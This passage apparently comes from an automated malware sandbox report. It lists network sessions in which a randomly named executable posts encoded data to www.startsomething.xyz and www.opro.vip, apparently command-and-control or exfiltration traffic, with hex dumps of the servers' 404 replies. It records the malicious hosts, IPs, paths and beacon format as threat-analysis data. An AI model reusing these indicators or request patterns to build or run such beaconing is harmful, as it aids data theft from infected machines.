                                                                  Data Ascii: 3h=/2xwZle+gMwsB/vN85Eqrt+t1fsbALJWj+auEUip3i0imMlLC8FJ5hlF3aY23eQ/WDwTskqluSG4ZmMXBGgoEmZu4g8Za14r5pJlGbt2+p1UKyYyb5HRe6mZs7gYRdiTY1QrfkQfUcrvy7ztIaCvfsgFLSBs0OfVKhUonsYBZ82b5yW6JJNLZdR2gJTSgYL5Tg==
                                                                  Jan 10, 2025 18:52:20.548613071 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:20 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.45002069.57.163.64801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:22.496164083 CET760OUTPOST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 51 67 69 68 75 74 4c 51 6f 5a 4a 36 68 6c 46 75 71 59 75 35 2b 51 4b 57 44 30 74 73 6c 57 6c 75 53 53 34 5a 6a 77 58 42 57 63 70 46 32 5a 73 68 51 38 62 58 56 34 72 35 70 4a 6c 47 62 34 52 2b 70 74 55 4a 43 6f 79 5a 59 48 57 51 61 6d 61 6b 62 67 59 56 64 69 66 59 31 52 4d 66 67 77 6c 55 65 6a 76 79 2f 33 74 49 4a 61 73 56 73 68 41 42 79 41 53 31 74 47 4e 50 54 52 64 73 71 63 7a 59 39 4f 47 38 30 62 67 59 34 73 63 4c 64 31 46 39 4f 61 6d 74 62 32 77 49 69 68 31 49 57 2f 6a 34 70 45 65 76 6a 33 75 41 6d 39 77 4b 6f 77 3d
                                                                  Data Ascii: 3h=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3QgihutLQoZJ6hlFuqYu5+QKWD0tslWluSS4ZjwXBWcpF2ZshQ8bXV4r5pJlGb4R+ptUJCoyZYHWQamakbgYVdifY1RMfgwlUejvy/3tIJasVshAByAS1tGNPTRdsqczY9OG80bgY4scLd1F9Oamtb2wIih1IW/j4pEevj3uAm9wKow=
                                                                  Jan 10, 2025 18:52:23.173947096 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:23 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.45002169.57.163.64801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:25.045869112 CET10842OUTPOST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 52 59 69 68 63 56 4c 43 5a 5a 4a 37 68 6c 46 6d 4b 59 36 35 2b 51 74 57 44 4d 58 73 6c 61 31 75 52 71 34 5a 46 45 58 56 31 45 70 4b 32 5a 73 38 67 38 65 61 31 34 2b 35 70 35 70 47 62 6f 52 2b 70 74 55 4a 41 77 79 65 4a 48 57 53 61 6d 5a 73 37 67 63 52 64 6a 41 59 31 34 7a 66 6d 73 31 54 71 76 76 38 2f 6e 74 62 71 2b 73 5a 73 68 4f 43 79 41 61 31 74 36 73 50 54 4d 69 73 71 42 75 59 39 71 47 78 6c 36 6a 41 70 51 65 57 63 70 2f 74 66 75 79 31 74 32 4d 42 67 38 4f 4f 57 7a 52 6e 34 55 49 30 42 50 67 52 6b 68 36 62 63 58 49 63 73 51 50 6c 64 70 77 67 75 6b 75 55 43 6c 36 44 71 52 47 76 7a 4a 38 46 6a 67 41 37 6e 6b 75 49 74 67 65 50 42 38 30 6c 31 4f 74 6d 52 6d 45 62 50 43 7a 62 41 4b 4a 39 2f 6f 42 36 48 79 42 42 6f 41 6a 5a 33 47 5a 52 47 6b 30 73 50 59 52 4e 77 73 2f 61 51 43 36 66 46 51 4b 67 33 4a 42 57 41 46 34 61 75 30 32 38 37 51 72 2b 68 4a 57 30 58 59 42 50 79 75 [TRUNCATED]
                                                                  Data Ascii: 3h=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3RYihcVLCZZJ7hlFmKY65+QtWDMXsla1uRq4ZFEXV1EpK2Zs8g8ea14+5p5pGboR+ptUJAwyeJHWSamZs7gcRdjAY14zfms1Tqvv8/ntbq+sZshOCyAa1t6sPTMisqBuY9qGxl6jApQeWcp/tfuy1t2MBg8OOWzRn4UI0BPgRkh6bcXIcsQPldpwgukuUCl6DqRGvzJ8FjgA7nkuItgePB80l1OtmRmEbPCzbAKJ9/oB6HyBBoAjZ3GZRGk0sPYRNws/aQC6fFQKg3JBWAF4au0287Qr+hJW0XYBPyuN1T6MvDH8wqcE8r0HwngLBR2RYwov4xD7pArPKtDTdIhtBjwntb0IX5rCjKm7VYpR87rqZtNvLJrfRNOwyLcejLH+6h+KVLy764+z8Yu/rftqFW3ocVzut4FIboyOxRDumPz7qmaCacv1mNDx640Tqzt6BDqSv3ayXcVr/wR61/O9RnML+20eFkAYZXPyBfFkjS5CKS96c237FI86TohgRJTkFhtovmvKJdTfGPW0NrtgYmafkNcNJ4Bg1T1EV5k5asjjnHTosoS58iT25z6+ZkEOyAoA/WFlnIEFurFZbUAlsjJh+GjL3ioo1U9n+n1Fjx7eiQUvG0HeuuauREtalcVqRJmhcQwFybJ06Kw0FaBPpc1XkVWqL3S/RkfwGyvjgGjCh89vZLDg7oDD4wrJ4+e6yx3B0bSX+DzI+RfzQyW/aWApR/fOXtbXKDEY0L4odmko7kJmTQnpT0n6qv38HM4ewhGecgZ4yJV580NYt7K/AW4OU3q/R2Nr92FeEF69TNGet5GwHDaCUVtRLE3oO+35u0lqjsjHXKwrWrhBPcCHtVh5VOhI380IB0Gj5r7GNt2q934X9InoFOzPN95SlNBv2D1yblfF0GuuEGdlZsX/SWGAnERRtOTpowN6NzVBnlwgYoCzIP/ZK0kSuvUXyMjYFApGnewaZ [TRUNCATED]
                                                                  Jan 10, 2025 18:52:25.680994987 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:25 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.45002269.57.163.64801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:27.583806038 CET464OUTGET /9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:28.272419930 CET548INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:28 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.450023170.33.13.246801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:33.795064926 CET710OUTPOST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 66 34 66 38 30 6b 7a 42 6d 6b 33 58 51 6b 2b 75 62 2b 55 34 48 71 4a 2f 4b 79 64 6e 63 70 46 6b 4e 6d 34 49 74 55 37 42 50 52 75 51 69 45 51 31 76 4c 6c 79 61 74 72 35 48 59 76 36 51 68 43 63 6d 71 4e 67 54 65 4f 56 68 36 55 45 6f 42 38 6c 2f 78 6f 39 4d 4f 2f 47 44 54 65 42 6d 49 7a 6a 6b 5a 30 62 53 4b 54 2f 79 7a 41 4a 70 67 65 61 76 78 4a 59 6a 37 4d 65 63 34 32 33 42 38 61 34 47 34 31 6c 38 64 30 32 71 39 63 39 4e 51 63 43 70 68 73 76 61 31 4a 37 56 4e 4c 50 78 6a 78 50 6f 4b 66 37 69 57 74 50 5a 54 6a 71 69 30 30 70 75 77 36 69 4f 77 3d 3d
                                                                  Data Ascii: 3h=7OhtZpOFOJnuf4f80kzBmk3XQk+ub+U4HqJ/KydncpFkNm4ItU7BPRuQiEQ1vLlyatr5HYv6QhCcmqNgTeOVh6UEoB8l/xo9MO/GDTeBmIzjkZ0bSKT/yzAJpgeavxJYj7Mec423B8a4G41l8d02q9c9NQcCphsva1J7VNLPxjxPoKf7iWtPZTjqi00puw6iOw==
                                                                  Jan 10, 2025 18:52:34.654228926 CET150INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:34 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:34.654453993 CET419INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.450024170.33.13.246801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:36.339319944 CET730OUTPOST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 74 6b 49 33 49 49 73 51 58 42 49 52 75 51 73 6b 51 77 72 4c 6c 39 61 74 75 4f 48 64 50 36 51 6c 69 63 6d 72 64 67 54 74 6d 55 75 4b 55 38 78 52 38 6a 37 78 6f 39 4d 4f 2f 47 44 54 36 72 6d 49 72 6a 6b 4a 6b 62 54 75 50 34 38 54 41 4f 75 67 65 61 72 78 4a 63 6a 37 4e 37 63 36 53 4a 42 36 65 34 47 38 78 6c 38 49 55 78 7a 4e 63 2f 53 67 64 41 70 79 31 44 55 46 51 71 4c 61 33 4f 2b 58 41 33 6b 73 53 68 7a 6e 4d 59 4c 54 48 5a 2f 7a 39 64 6a 7a 48 72 56 2b 66 36 6f 47 32 4f 2b 45 44 55 4f 61 78 75 2f 50 4e 61 37 77 67 3d
                                                                  Data Ascii: 3h=7OhtZpOFOJnucZv82DnBhE3UJE+uSeU8HqF/KzZ3cftkI3IIsQXBIRuQskQwrLl9atuOHdP6QlicmrdgTtmUuKU8xR8j7xo9MO/GDT6rmIrjkJkbTuP48TAOugearxJcj7N7c6SJB6e4G8xl8IUxzNc/SgdApy1DUFQqLa3O+XA3ksShznMYLTHZ/z9djzHrV+f6oG2O+EDUOaxu/PNa7wg=
                                                                  Jan 10, 2025 18:52:37.262958050 CET150INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:37.266720057 CET419INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.450025170.33.13.246801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:38.887358904 CET10812OUTPOST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 56 6b 49 6c 41 49 74 33 44 42 4a 52 75 51 6b 45 51 78 72 4c 6c 61 61 70 43 4b 48 64 4c 45 51 6e 61 63 6e 4a 46 67 52 63 6d 55 31 61 55 38 73 42 38 6d 2f 78 70 67 4d 4e 58 43 44 54 71 72 6d 49 72 6a 6b 50 49 62 54 36 54 34 73 6a 41 4a 70 67 65 47 76 78 4a 30 6a 37 6b 47 63 36 47 5a 42 4c 69 34 47 63 68 6c 36 38 30 78 73 39 63 35 54 67 64 69 70 79 4a 63 55 46 4d 6d 4c 66 69 72 2b 51 77 33 31 39 72 42 32 55 67 6b 50 53 76 45 6d 55 64 61 37 43 54 38 56 63 32 48 75 58 6a 56 71 56 48 52 45 61 63 77 6a 76 70 50 74 67 48 74 77 58 78 62 6a 69 71 35 62 37 75 51 76 69 54 70 46 76 5a 32 63 59 77 4c 53 79 54 46 41 36 4d 4d 79 6c 4e 6e 46 65 4c 68 6f 49 7a 4d 43 5a 47 6f 6b 63 65 42 68 71 55 7a 43 34 6d 4c 4f 41 46 33 68 6d 47 52 46 74 2f 61 6d 54 53 35 65 63 36 4c 46 73 46 74 51 6f 78 4e 52 6a 49 58 50 61 56 57 5a 73 73 67 6b 4f 54 46 54 38 51 63 47 54 77 43 4c 75 6c 64 31 2b 62 [TRUNCATED]
                                                                  Data Ascii: 3h=7OhtZpOFOJnucZv82DnBhE3UJE+uSeU8HqF/KzZ3cfVkIlAIt3DBJRuQkEQxrLlaapCKHdLEQnacnJFgRcmU1aU8sB8m/xpgMNXCDTqrmIrjkPIbT6T4sjAJpgeGvxJ0j7kGc6GZBLi4Gchl680xs9c5TgdipyJcUFMmLfir+Qw319rB2UgkPSvEmUda7CT8Vc2HuXjVqVHREacwjvpPtgHtwXxbjiq5b7uQviTpFvZ2cYwLSyTFA6MMylNnFeLhoIzMCZGokceBhqUzC4mLOAF3hmGRFt/amTS5ec6LFsFtQoxNRjIXPaVWZssgkOTFT8QcGTwCLuld1+bh80RM9CsOR7/3rVI1aoleMaH3LUH5EJLw/A4QF+323nG9YfpSia9MC0kbt36iqsWIfyx7WnUytZPG+MOqctADnVElx+D3KO6r5MVAsxu/Qit0yyGz/OoJyeveD4hXENubIXF/9YBJ0GZGZMaQR50y/rvL7HeGUW9CEHi0nXY1yZGGYjYPTr3IXKRO4ERAkwhl95wpvzx8x5JZ3yV2e0rw/AoDAUbqrXrYrcJw+aDgCxc4nAgfCF/IDQZHy9qz/SkBOyIL/MohtOP4g8F/DgTLKFerOrow3LHboeD0C/KFf/q2OBYRr77r+ciCQkZyri0VMrrJaq7zHlq4P0+G4sMfR1ukx1t0vdb6F+jJiTi2WF6sZmu5235dv3WLVxt0Y+DPrtNr8pkVUYTrLd7XhrYXc0abmuePxGr0lBuptRYYuPZiuCcCi1fPXlsIyo5DC634eZbCckfsa+DdnqgRNyEkTqRUSfrkpdFrUsKiUvq/96bQn1ygmjuxx5glxQ6ogK0hMtiHJYaOnxeJRJKN3h6JhWKZMPhq8fw3P5lbDFFZHtMTWBz6nGZ6/hFqWc7zK/aio/UOCBm76RxE+/EoCbmOlBlvVrWBGuzyE686PaB2Wj6Oc8tk6BRkJDUmaTAKnac84DOsbkbWOsW4NVYY3gWCXlUqvTF4j73Lb [TRUNCATED]
                                                                  Jan 10, 2025 18:52:39.931550026 CET150INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:39 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ecf7-1a3"
                                                                  Jan 10, 2025 18:52:39.932400942 CET419INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.450026170.33.13.246801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
